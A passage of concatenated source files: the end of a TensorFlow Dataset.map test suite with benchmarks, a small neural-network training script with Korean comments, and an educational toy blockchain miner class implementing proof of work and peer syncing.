with self.test_session() as sess:
sess.run(counter_var.initializer)
sess.run(init_op)
for i in range(10):
self.assertEqual(i, sess.run(counter_var))
self.assertEqual(i + 1, sess.run(get_next))
self.assertEqual(10, sess.run(counter_var))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
self.assertEqual(10, sess.run(counter_var))
def testCaptureUninitializedVariableError(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
with self.assertRaises(errors.NotFoundError):
sess.run(get_next)
def testSeededStatefulOperatorIsProperlyStateful(self):
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(sess.run(get_next))
self.assertEqual(10, len(random_values))
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
sess.run(init_op)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(sess.run(get_next))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
def testMapDict(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: {"foo": x * 2, "bar": x ** 2})
.map(lambda d: d["foo"] + d["bar"])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual(i * 2 + i ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapNamedtuple(self, count=10):
# construct dataset of tuples
labels = dataset_ops.Dataset.range(count)
images = labels.map(lambda l: -l)
dataset_tuple = dataset_ops.Dataset.zip((labels, images))
# convert dataset of tuples to dataset of namedtuples
example = namedtuple("Example", ["label", "image"])
dataset_namedtuple = dataset_tuple.map(example)
def preprocess_tuple(label, image):
image = 2 * image
return label, image
def preprocess_namedtuple(example):
return example._replace(image=2 * example.image)
# preprocess both datasets
dataset_tuple = dataset_tuple.map(preprocess_tuple)
dataset_namedtuple = dataset_namedtuple.map(preprocess_namedtuple)
next_tuple = dataset_tuple.make_one_shot_iterator().get_next()
next_namedtuple = dataset_namedtuple.make_one_shot_iterator().get_next()
# make sure both datasets contain the same data
with self.test_session() as sess:
for i in range(count):
tuple_, namedtuple_ = sess.run([next_tuple, next_namedtuple])
self.assertEqual(tuple_, namedtuple_)
self.assertEqual(tuple_, (i, -2 * i))
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_namedtuple)
def testUseStepContainerInMap(self):
row = np.arange(6)
iterator = (
dataset_ops.Dataset.from_tensors(row)
.map(lambda elems: functional_ops.map_fn(lambda x: x * x, elems))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
self.assertAllEqual(row ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetch(self):
# We will use this event to test that `_map_py_func()` has been
# invoked a certain number of times (6 times, to be exact) after
# consuming fewer elements from the iterator.
ev = threading.Event()
set_event_during_invocation = 5
def _map_py_func(x):
if x == set_event_during_invocation:
ev.set()
return x * x
def _map_fn(x):
return script_ops.py_func(_map_py_func, [x], x.dtype)
buffer_size_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
iterator = (
dataset_ops.Dataset.range(100)
.map(_map_fn)
.prefetch(buffer_size_placeholder)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# Simple test that prefetch yields the expected values in the
# expected order.
for buffer_size in [1, 10, 100, 1000]:
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# We can indirectly observe that varying the buffer size has the
# intended effect by observing when `ev` is set (on the 6th
# invocation of `_map_py_func()`).
# NOTE(mrry): We do not test with `buffer_size ==
# set_event_during_invocation`, because we must consume at least
# one element to start the prefetching.
for buffer_size in range(1, set_event_during_invocation):
event_will_be_set_after_consuming = (
set_event_during_invocation - buffer_size + 1)
ev.clear()
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(event_will_be_set_after_consuming):
self.assertFalse(ev.is_set())
self.assertEqual(i * i, sess.run(get_next))
ev.wait()
for i in range(event_will_be_set_after_consuming, 100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReturnList(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: [x, constant_op.constant(37.0)])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMultiOutputPyFunc(self):
# The `tf.py_func()` op returns a list of tensors for its outputs.
def _map_fn(x_tensor):
def _map_py_func(x):
return x, np.array(37.0, dtype=np.float64)
return script_ops.py_func(
_map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])
iterator = (dataset_ops.Dataset.range(10)
.map(_map_fn)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def assertSparseValuesEqual(self, a, b):
self.assertAllEqual(a.indices, b.indices)
self.assertAllEqual(a.values, b.values)
self.assertAllEqual(a.dense_shape, b.dense_shape)
def testSparse(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
iterator = (dataset_ops.Dataset.range(10)
.map(_sparse)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
actual = sess.run(get_next)
self.assertTrue(isinstance(actual, sparse_tensor.SparseTensorValue))
self.assertSparseValuesEqual(actual, _sparse(i))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testSparseChain(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
def _check(i):
self.assertTrue(sparse_tensor.is_sparse(i))
return sparse_ops.sparse_concat(0, [i, i])
iterator = (
dataset_ops.Dataset.range(10).map(_sparse).map(_check)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
actual = sess.run(get_next)
self.assertTrue(isinstance(actual, sparse_tensor.SparseTensorValue))
self.assertSparseValuesEqual(actual, _check(_sparse(i)).eval())
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testParallelMapOutOfRangeError(self):
def raising_py_func(i):
if i == 100:
raise StopIteration()
else:
return i
iterator = (
dataset_ops.Dataset.range(105)
.map(lambda x: script_ops.py_func(raising_py_func, [x], dtypes.int64),
num_parallel_calls=2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(100):
self.assertEqual(i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testConstantOutput(self):
iterator = (
dataset_ops.Dataset.range(10).map(lambda x: [x, "hello", 10])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, b"hello", 10), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
class MapDatasetBenchmark(test.Benchmark):
def benchmarkChainOfMaps(self):
chain_lengths = [0, 1, 2, 5, 10, 20, 50]
for chain_length in chain_lengths:
with ops.Graph().as_default():
dataset = dataset_ops.Dataset.from_tensors(0).repeat(None)
for _ in range(chain_length):
dataset = dataset.map(lambda x: x)
iterator = dataset.make_one_shot_iterator()
next_element = iterator.get_next()
with session.Session() as sess:
for _ in range(5):
sess.run(next_element.op)
deltas = []
for _ in range(100):
start = time.time()
for _ in range(100):
sess.run(next_element.op)
end = time.time()
deltas.append(end - start)
median_wall_time = np.median(deltas) / 100
print("Map dataset chain length: %d Median wall time: %f"
% (chain_length, median_wall_time))
self.report_benchmark(
iters=1000, wall_time=median_wall_time,
name="benchmark_map_dataset_chain_latency_%d" % chain_length)
def benchmarkMapFanOut(self):
fan_outs = [1, 2, 5, 10, 20, 50, 100]
for fan_out in fan_outs:
with ops.Graph().as_default():
dataset = dataset_ops.Dataset.from_tensors(
tuple(0 for _ in range(fan_out))).repeat(None).map(lambda *xs: xs)
iterator = dataset.make_one_shot_iterator()
next_element = iterator.get_next()
with session.Session() as sess:
for _ in range(5):
sess.run(next_element[0].op)
deltas = []
for _ in range(100):
start = time.time()
for _ in range(100):
sess.run(next_element[0].op)
end = time.time()
deltas.append(end - start)
median_wall_time = np.median(deltas) / 100
print("Map dataset fan out: %d Median wall time: %f"
% (fan_out, median_wall_time))
self.report_benchmark(
iters=1000, wall_time=median_wall_time,
name="benchmark_map_dataset_fan_out_%d" % fan_out)
if __name__ == "__main__":
test.main()
|
gis_network2.py
|
import cnn_module as cnn
import numpy as np
import cv2  # used for on-screen display
import gis_data2 as gis_data
import gis_weight
import threading  # for screen output
# Change this to False if you want to train quickly!
# When enabled, the network output is drawn on screen.
visible = False
# Findings ################
# Without He and Xavier initialization, the loss starts in the hundreds of thousands...
# With them applied, it starts from a few thousand.
# Without batch norm, the loss does not decrease.
###########################
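# Illustrative sketch (not part of the training script): the two weight initializations referred
# to in the findings above. How cnn_module/gis_weight actually initialize their tensors is not
# shown here, so these NumPy helpers only make the idea concrete.
def example_he_init(fan_in, fan_out):
    # He initialization: zero-mean Gaussian with variance 2 / fan_in, suited to ReLU layers.
    return np.random.randn(fan_in, fan_out) * np.sqrt(2.0 / fan_in)
def example_xavier_init(fan_in, fan_out):
    # Xavier/Glorot initialization: zero-mean Gaussian with variance 2 / (fan_in + fan_out).
    return np.random.randn(fan_in, fan_out) * np.sqrt(2.0 / (fan_in + fan_out))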
# Create the data layer
dataList = gis_data.load()
dataLayer = cnn.createDatasetLayer(dataList[0], dataList[0]) # N, 3, 200, 200
print("dataList[0]", dataList[0].shape)
# Create the optimizer
optimizer = cnn.createAda(0.018)
print("가중치 이름을 입력하세요. 만들지 않으면 gis_weight.py를 실행하여 데이터를 만드세요")
weightList = gis_weight.loadWeight(input())
# Create the encoder network
with cnn.NetworkBuilder() as builder:
builder.createNetwork(6)
builder.addConv3dLayer(weightList[2], weightList[3], weightList[1], 0, 0)
builder.addBatchnormLayer()
builder.addReluLayer()
builder.addFCLayer(weightList[4], weightList[5])
builder.addBatchnormLayer()
builder.addReluLayer()
incoderNet = builder.getNetwork()
# Create the decoder network
with cnn.NetworkBuilder() as builder:
builder.createNetwork(5)
builder.addFCLayer(weightList[6], weightList[7])
builder.addBatchnormLayer()
builder.addReluLayer()
builder.addFCLayer(weightList[8], weightList[9])
builder.addSigmoidLayer()
decoderNet = builder.getNetwork()
# Create the GAN network
with cnn.NetworkBuilder() as builder:
builder.createNetwork(2)
builder.addNetworkLayer(incoderNet)
builder.addNetworkLayer(decoderNet)
ganNet = builder.getNetwork()
# Create the training network
with cnn.NetworkBuilder() as builder:
builder.createNetwork(2)
builder.addNetworkLayer(ganNet)
builder.addMeansquareLayer()
trainNet = builder.getNetwork()
trainNet.setLearningData(dataLayer)
trainNet.initForward()
trainNet.initBackward()
if visible:
out = np.zeros(dataList[1].shape)
ganNet.getRightTerminal().out.release_deep()
ganNet.getRightTerminal().out = cnn.Tensor.numpy2Tensor(out)
cv2.imshow('Out', np.uint8( cv2.normalize(out[0].transpose(1,2,0), None, 0, 255, cv2.NORM_MINMAX) ))
def draw():
cv2.imshow('Out', np.uint8( cv2.normalize(out[0].transpose(1,2,0), None, 0, 255, cv2.NORM_MINMAX) ))
if __name__ == '__main__':
for i in range(1,1000):
print('epoch',i)
#while(trainNet.forward(0, 1)>0):
# print(',')
# pass
        for _ in range(12):
            trainNet.forward(0, 1)
print('loss',trainNet.out.scalas[0])
#while(trainNet.backward(0,1)>0):
# pass
        for _ in range(12):
            trainNet.backward(0, 1)
while(trainNet.update(optimizer,0,1)>0):
pass
if visible:
#t = threading.Thread(target=draw)
#t.start()
cv2.imshow('Out', np.uint8( cv2.normalize(out[0].transpose(1,2,0), None, 0, 255, cv2.NORM_MINMAX) ))
cv2.waitKey(30)
if(i % 15 == 0):
print("auto save")
gis_weight.syncWeight(weightList)
|
miner.py
|
import os
import pickle
import hashlib
import logging
import requests
import jsonpickle
from datetime import timedelta
from multiprocessing import Process, Queue
from ..utils.constants import *
from ..blockchain.data import Data
from ..blockchain.block import Block
from ..client.server import start_server
from ..utils.errors import ChainNotValidError
from ..blockchain.blockchain import Blockchain
from ..utils.utils import split_url_string, create_proper_url_string, Job, encode_file_path_properly
logger = logging.getLogger(__name__)
class Miner(object):
def __init__(self, path_to_chain: str, json_format: bool, port: int, difficulty: int, neighbours: list, force_new_chain: bool) -> None:
"""
Constructor for new ``Miner`` object.
Args:
path_to_chain (str): Path to chain for restore/ backup purposes.
json_format (bool): Use JSON format for chain? Otherwise pickle is used.
            port (int): Port on which this miner's server listens.
difficulty (int): Amount of trailing 0s for proof of work
neighbours (list): List of known neighbours, e.g. ``["localhost:23456", "miner0815:6666"]``
force_new_chain (bool): Force miner to create a new chain instead of use the existing one.
"""
logger.info("Create 'Miner' object ...")
logger.debug(f"Arguments - path_to_chain: {path_to_chain}, json_format: {json_format}, port: {port}, difficulty: {difficulty}, neighbours: {neighbours}")
logger.debug("Init parent Class.")
super().__init__()
logger.debug(f"Type checks: 'path_to_chain' ...")
if not isinstance(path_to_chain, str):
raise ValueError("'path_to_chain' has to be of type string!")
logger.debug(f"Type checks: 'json_format' ...")
if not isinstance(json_format, bool):
raise ValueError("'json_format' has to be a boolean value!")
logger.debug(f"Type checks: 'port' ...")
if not (isinstance(port, int) and not isinstance(port, bool)) or port < 1 or port > 65535:
raise ValueError("'port' is of wrong type or out of range!")
logger.debug(f"Type checks: 'difficulty' ...")
if not (isinstance(difficulty, int) and not isinstance(difficulty, bool)) or difficulty < 1:
raise ValueError("'difficulty' is of wrong type or lower than 1!")
logger.debug(f"Type checks: 'neighbours' ...")
if not isinstance(neighbours, list):
raise ValueError("'neighbours' has to be of type list!")
for index, neighbour in enumerate(neighbours):
if not isinstance(neighbour, str):
raise ValueError("Elements of 'neighbours' has to be of type string!")
try:
split_url_string(neighbour)
except:
raise ValueError(f"Neighbour at index: {index} of 'neighbours' is not a valid 'ip:port' representation. (Maybe Port out of range or protocol is not in [http, https]?")
logger.debug(f"Type checks done: all valid.")
self._jobs = []
self._port = port
self._queue = None
self._neighbours = set()
self._server_process = None
self._difficulty = difficulty
self._unprocessed_messages = set()
self._blockchain = Blockchain(path_to_chain=encode_file_path_properly(path_to_chain), json_format=json_format, force_new_chain= force_new_chain)
logger.debug(f"Check chain ...")
# check if chain is valid
if not self._is_chain_valid():
#TODO: test
raise ChainNotValidError("Local chain is not valid!")
logger.debug(f"Check chain: valid.")
logger.debug(f"Create neighbours: ...")
for neighbour in neighbours:
if len(self.neighbours) < MAX_NEIGHBOURS:
neighbour_internal = split_url_string(neighbour)
self.neighbours.add(neighbour_internal)
logger.info("Created 'Miner' object.")
logger.debug(f"'Miner' object created.")
def start(self) -> None:
"""
        Starts background ``Job`` objects for the gossip protocol, chain syncing, data syncing and
        communication, as well as the server functionality as a separate process.
        Finally enters the blocking ``_mine()`` loop.
"""
logger.info("Configure and start 'Miner' background tasks ...")
update_neighbour_job = ("Gossip Job", Job(interval=timedelta(seconds=GOSSIP_TIME_SECONDS), execute=self._update_neighbours))
logger.debug(f"Background thread configured: '{update_neighbour_job[0]}' - interval: {GOSSIP_TIME_SECONDS} seconds.")
check_for_longest_chain_job = ("Sync Chain Job", Job(interval=timedelta(seconds=CHAIN_SYNC_TIME_SECONDS), execute=self._check_for_longest_chain))
logger.debug(f"Background thread configured: '{check_for_longest_chain_job[0]}' - interval: {CHAIN_SYNC_TIME_SECONDS} seconds.")
fetch_unprocessed_data_job = ("Sync Unprocessed Data Job)", Job(interval=timedelta(seconds=UNPROCESSED_DATA_SYNC_TIME_SECONDS), execute=self._fetch_unprocessed_data))
logger.debug(f"Background thread configured: '{fetch_unprocessed_data_job[0]}' - interval: {UNPROCESSED_DATA_SYNC_TIME_SECONDS} seconds.")
backup_local_chain_job = ("Backup Local Chain Job", Job(interval=timedelta(seconds=BACKUP_LOCAL_CHAIN_TIME_SECONDS), execute=self._backup_local_chain))
logger.debug(f"Background thread configured: '{backup_local_chain_job[0]}' - interval: {BACKUP_LOCAL_CHAIN_TIME_SECONDS} seconds.")
communicate_job = ("Communication Job", Job(interval=timedelta(seconds=0), execute=self._communicate))
logger.debug(f"Background thread configured: '{communicate_job[0]}'.")
self._queue = Queue()
self._server_process = Process(target=start_server, args=[self.queue, self.port])
logger.debug(f"'Server Process' configured.")
logger.debug("Start 'Miner' background threads ...")
update_neighbour_job[1].start()
logger.debug(f"'{update_neighbour_job[0]}' thread started.")
check_for_longest_chain_job[1].start()
logger.debug(f"'{check_for_longest_chain_job[0]}' thread started.")
fetch_unprocessed_data_job[1].start()
logger.debug(f"'{fetch_unprocessed_data_job[0]}' thread started.")
backup_local_chain_job[1].start()
logger.debug(f"'{backup_local_chain_job[0]}' thread started.")
communicate_job[1].start()
logger.debug(f"'{communicate_job[0]}' thread started.")
self.server_process.start()
logger.debug(f"'Server Process' started.")
logger.info("All 'Miner' background tasks started.")
self.jobs.append(update_neighbour_job)
self.jobs.append(backup_local_chain_job)
self.jobs.append(fetch_unprocessed_data_job)
self.jobs.append(check_for_longest_chain_job)
self.jobs.append(communicate_job)
logger.debug("Start mining ...")
self._mine()
def stop(self) -> None:
"""
        Function that gets called when the Python process is shut down. Takes care of stopping all threads/processes and saves the chain to disk.
"""
logger.info("Start shutting down routine.")
for job_name, job in self.jobs:
logger.debug(f"Shutting down '{job_name}' ...")
job.stop()
logger.debug(f"'{job_name}' Stopped.")
logger.debug(f"Shutting down 'Server Process' ...")
self.server_process.terminate()
self.server_process.join()
logger.debug(f"'Server Process' Stopped.")
logger.debug(f"Saving local chain ...")
self.blockchain.save_chain()
logger.debug(f"Chain saved.")
logger.info("Shutting down routine done.")
def _communicate(self) -> None:
"""
Periodical thread to communicate with server process.
"""
if not self._queue.empty():
message = self._queue.get_nowait()
logger.debug(f"Processing message: '{message[0]}'' ...")
if ADD_KEY == message[0]:
logger.debug(f"Found handle for message with key: '{ADD_KEY}'")
self._new_message(message[1])
elif SEND_CHAIN_KEY == message[0]:
logger.debug(f"Found handle for message with key: '{SEND_CHAIN_KEY}'")
message[1].send({
"chain": jsonpickle.encode(self.blockchain.chain.copy()),
"length": len(self.blockchain.chain),
})
elif SEND_NEIGHBOURS_KEY == message[0]:
logger.debug(f"Found handle for message with key: '{SEND_NEIGHBOURS_KEY}'")
message[1].send({
"neighbours": jsonpickle.encode(self.neighbours.copy()),
"length": len(self.neighbours),
})
elif SEND_DATA_KEY == message[0]:
logger.debug(f"Found handle for message with key: '{SEND_DATA_KEY}'")
message[1].send(jsonpickle.encode(self.unprocessed_data.copy()))
else:
logger.warning(f"Could not find handle for message: '{message[0]}'")
def _proof_of_work(self, last_proof: int, difficulty: int) -> int:
"""
Simple proof of work:
        Find a number ``p`` such that hashing it together with the previous block's proof produces a hash with ``difficulty`` trailing 0s.
Args:
last_proof (int): Solution of the last blocks' proof of work
difficulty (int): Amount of trailing 0s for a valid proof of work.
Returns:
int: Solution for this proof of work quiz.
Raises:
ValueError: Will be raised if ``difficulty`` is not a positive integer value.
"""
logger.debug(f"Do Proof of Work. - last_proof: {last_proof}, difficulty: {difficulty}.")
if difficulty <= 0:
raise ValueError("'difficulty' has to be a positive integer value.")
proof = 0
while not self._is_proof_of_work_valid(last_proof, proof, difficulty):
proof += 1
logger.debug(f"Found Proof of Work - last_proof: {last_proof}, difficulty: {difficulty}.")
logger.info(f"Found a valid Proof of Work.")
return proof
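    # Illustrative sketch (not part of the original class): the real `_is_proof_of_work_valid`
    # used above is not shown in this excerpt, but a trailing-zeros check of the kind described
    # in the docstring could look like the helper below. The exact hashing scheme of the real
    # method is an assumption here.
    @staticmethod
    def _example_trailing_zeros_check(last_proof: int, proof: int, difficulty: int) -> bool:
        guess_hash = hashlib.sha256(f"{last_proof}{proof}".encode()).hexdigest()
        return guess_hash.endswith("0" * difficulty)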
def _is_chain_valid(self, chain: list = None) -> bool:
"""
Checks if the given ``chain`` satisfies the following rules:
1. The first (genesis) block:
- ``index`` = 0
- ``previous_hash`` = None
- ``proof`` = None
2. each and every following block:
- ``index``: step size 1 and monotonically increasing (1, 2, 3, 4, ...)
- ``previous_hash``: SHA-256 of the string representation of the preceding block
- ``proof``: has to be valid -> see: :meth:`~Miner.is_proof_of_work_valid`
            - ``timestamp``: higher than the timestamp of the preceding block
Args:
chain (list): Optional chain if ``None`` internal representation is used.
Returns:
bool: ``True`` if ``chain`` is valid, ``False`` otherwise.
"""
logger.debug(f"Check if chain is valid.")
previous_block = None
if chain == None:
chain_to_check = self.blockchain.chain
else:
chain_to_check = chain
for index, block in enumerate(chain_to_check):
# rules for genesis block
if index == 0:
# correct genesis block?
if block.index != 0 or block.previous_hash != None or block.proof != None:
logger.debug(f"Genesis Block is not valid: -> What is wrong? index: {block.index != 0}, previous_hash: {block.previous_hash != None}, proof: {block.proof != None}.")
# genesis block is not valid! => wrong chain
return False
# rules for any other block
else:
previous_hash = Miner._hash(previous_block)
if block.index != index or block.previous_hash != previous_hash or not self._is_proof_of_work_valid(previous_block.proof, block.proof, self.difficulty) or previous_block.timestamp >= block.timestamp:
logger.debug(f"Block with index: {block.index} ist not valid: -> What is wrong? index: {block.index != index}, previous_hash: {block.previous_hash != previous_hash}, PoW valid: {self._is_proof_of_work_valid(previous_block.proof, block.proof, self.difficulty)}, timestamp: {previous_block.timestamp >= block.timestamp}.")
# block ist not valid! => wrong chain
return False
previous_block = block
logger.debug(f"Chain is valid.")
return True
def _new_message(self, message: str) -> None:
"""
Adds the new ``message`` to its local cache.
Args:
message (str):
"""
logger.debug(f"Create new unprocessed Data ... - message: '{message}' ...")
data = Data(message)
self.unprocessed_data.add(data)
logger.debug(f"New unprocessed Data created. - message: '{data.message}', id: '{data.id}'")
logger.info(f"New message added. - message: '{data.message}', id: '{data.id}'")
def _backup_local_chain(self) -> None:
"""
Periodical thread to backup the local chain to disc.
"""
logger.debug(f"Backup local chain ... - json_format: {self.blockchain.json_format}")
hash_file_path = f"{os.path.splitext(self.blockchain.path_to_chain)[0]}.hash"
def _do_backup(hash_file_path: str, encoded_chain_hash: str):
"""
Helper function that does the actual backup steps.
Args:
hash_file_path (str): String that describes the path to the hash file.
encoded_chain_hash (str): Hash value of the actual local chain.
"""
if not os.path.isfile(hash_file_path):
# if no hash file exists -> create one with actual hash value
with open(hash_file_path, "w") as hash_file:
logger.debug(f"No existing hash file. Write actual hash value.")
hash_file.write(encoded_chain_hash)
logger.info(f"Backed up chain -> Missing hash file (fixed)")
else:
# All as expected: check hash and backup if necessary
with(open(hash_file_path, "r")) as chain_hash_file:
saved_chain_hash = chain_hash_file.read()
if saved_chain_hash != encoded_chain_hash:
logger.debug(f"Hash of chain on disc differ from local chain hash.")
logger.debug(f"Backup Chain.")
self.blockchain.save_chain()
logger.debug(f"Save new hash file.")
with(open(hash_file_path, "w")) as chain_hash_file:
chain_hash_file.write(encoded_chain_hash)
logger.info(f"Backed up chain -> Chain saved.")
else:
logger.info(f"Backed up chain -> No backup needed.")
if self.blockchain.json_format:
logger.debug(f"Encode to JSON")
encoded_chain = jsonpickle.encode(self.blockchain.chain)
encoded_chain_hash = hashlib.sha256(encoded_chain.encode()).hexdigest()
_do_backup(hash_file_path, encoded_chain_hash)
else:
logger.debug(f"Encode with pickle")
encoded_chain = pickle.dumps(self.blockchain.chain)
encoded_chain_hash = hashlib.sha256(encoded_chain).hexdigest()
_do_backup(hash_file_path, encoded_chain_hash)
def _fetch_unprocessed_data(self) -> None:
"""
        Periodical thread to get unprocessed data from neighbours.
=> Broadcasts unprocessed data around the network.
"""
logger.debug(f"Syncing unprocessed data ... - neighbours: '{self.neighbours}'")
old_data = self.unprocessed_data
# ask all neighbours for their data queues.
for neighbour in self.neighbours.copy():
logger.debug(f"Fetch data of neighbour: '{neighbour}'")
response = requests.get(create_proper_url_string(neighbour, DATA_ENDPOINT))
if response.status_code == HTTP_OK:
logger.debug(f"Get data of neighbour: '{neighbour}'")
data_queue = jsonpickle.decode(response.json())
self.unprocessed_data.update(data_queue)
logger.debug(f"Data of neighbour: '{neighbour}' added.")
else:
logger.warning(f"Response of neighbour: '{neighbour}' has bad status_code: '{response.status_code}'")
if old_data == self.unprocessed_data:
logger.info(f"Synced unprocessed data -> No new data.")
else:
logger.info(f"Synced unprocessed data -> New data.")
logger.debug(f"Syncing unprocessed data done.")
def _is_data_processed(self, data: Data) -> bool:
"""
Checks if ``data`` is already in local chain.
Args:
data (Data): ``Data`` object to check if it exists in the actual chain.
Returns:
            bool: ``True`` if ``data`` is already contained in the local chain, ``False`` otherwise.
"""
# TODO: speedup with batches:
# in: list of Data objects to check
# out: list of Data objects to mine
logger.debug(f"Check if data is not processed ... - data.id: '{data.id}', data.message: '{data.message}'")
for block in self.blockchain.chain:
if block.data == data:
logger.debug(f"Data is not processed: - data.id: '{data.id}', data.message: '{data.message}'")
return True
logger.debug(f"Data is already processed: - data.id: '{data.id}', data.message: '{data.message}'")
return False
def _update_neighbours(self) -> None:
"""
Periodical thread to update neighbours if limit is not exceeded.
"""
logger.debug(f"Update neighbours ... - neighbours: '{self.neighbours}'")
length_old_neighbours = len(self.neighbours)
# TODO: Delete not accessible neighbours
if len(self.neighbours) < MAX_NEIGHBOURS:
logger.debug(f"Maximum amount of neighbours not exceeded. -> update ...")
# ask all neighbours for their neighbours.
for neighbour in self.neighbours.copy():
logger.debug(f"Fetch neighbours of neighbour: '{neighbour}'")
response = requests.get(create_proper_url_string(neighbour, NEIGHBOURS_ENDPOINT))
if response.status_code == HTTP_OK:
logger.debug(f"Get neighbours of neighbour: '{neighbour}'")
new_neighbours = jsonpickle.decode(response.json()["neighbours"])
# TODO check response like in constructor...
# Add unknown miner to 'neighbours', return when max amount of neighbours is reached
for new_neighbour in new_neighbours:
# Do not add own address
self.neighbours.add(new_neighbour)
if len(self.neighbours) >= MAX_NEIGHBOURS:
logger.debug(f"Maximum amount of neighbours exceeded -> Stop syncing")
logger.info(f"Updated neighbours -> New neighbours added.")
return
else:
logger.warning(f"Response of neighbour: '{neighbour}' has bad status_code: '{response.status_code}'")
if length_old_neighbours < len(self.neighbours):
logger.info(f"Updated neighbours -> New neighbours added.")
else:
logger.info(f"Updated neighbours -> No new neighbours available.")
logger.debug(f"Update neighbours done.")
def _check_for_longest_chain(self) -> None:
"""
Consensus Algorithm:
        Ask each ``neighbour`` for its chain.
        Replace the local chain with the longest valid chain found in the network.
"""
logger.debug(f"Syncing chain ... - neighbours: '{self.neighbours}'")
new_chain = None
old_chain = self.blockchain.chain
# only longest chain is of interest
max_length = len(self.blockchain.chain)
for neighbour in self.neighbours.copy():
logger.debug(f"Fetch chain of neighbour: '{neighbour}'")
response = requests.get(create_proper_url_string(neighbour, CHAIN_ENDPOINT))
if response.status_code == HTTP_OK:
logger.debug(f"Get chain of neighbour: '{neighbour}'")
chain = jsonpickle.decode(response.json()['chain'])
length = len(chain)
# chain longer and valid?
if length > max_length and self._is_chain_valid(chain):
logger.debug(f"New chain is longer. - neighbour: '{neighbour}', length of old chain: '{max_length}', length of chain: '{length}'")
max_length = length
new_chain = chain
else:
logger.warning(f"Response of neighbour: '{neighbour}' has bad status_code: '{response.status_code}'")
# replace local chain with longest valid chain of all neighbours network
if new_chain:
self.blockchain.chain = new_chain
logger.debug(f"Longer chain added.")
if old_chain == self.blockchain.chain:
logger.info(f"Synced chain -> Have already longest chain.")
else:
logger.info(f"Synced chain -> New (longer) chain added.")
logger.debug(f"Syncing chain done.")
def _mine(self) -> None:
"""
Blocking Mining loop.
        If unprocessed data is available, it pops an entry and mines a new block.
"""
logger.info(f"Start Mining ...")
logger.debug(f"Start Mining ...")
while True:
if len(self.unprocessed_data) > 0:
data = self.unprocessed_data.pop()
logger.debug(f"There is local unprocessed data. - data.id: '{data.id}', data.message: '{data.message}'")
if not self._is_data_processed(data):
logger.debug(f"Data is not processed -> mine new block. - data.id: '{data.id}', data.message: '{data.message}'")
last_block = self.blockchain.last_block
last_proof = last_block.proof
previous_hash = self._hash(last_block)
# proof of work for new block
proof = self._proof_of_work(last_proof, self.difficulty)
block = self.blockchain.add_new_block(data=data, proof=proof, previous_hash=previous_hash)
logger.debug(f"New Block mined. - block.index: {block.index}, block.proof: {block.proof}, block.previous_hash: {block.previous_hash}, block.timestamp: {block.timestamp}, block.data.id: {block.data.id}, block.data.message: {block.data.message}")
logger.info(f"New block mined. - block.index: {block.index}, block.timestamp: {block.timestamp}")
@staticmethod
def _hash(block: Block) -> str:
"""
Hash a ``Block`` object with SHA-256.
Args:
block (Block): Object of class ``Block`` to hash.
Returns:
str: Hex representation of ``block`` hash.
Raises:
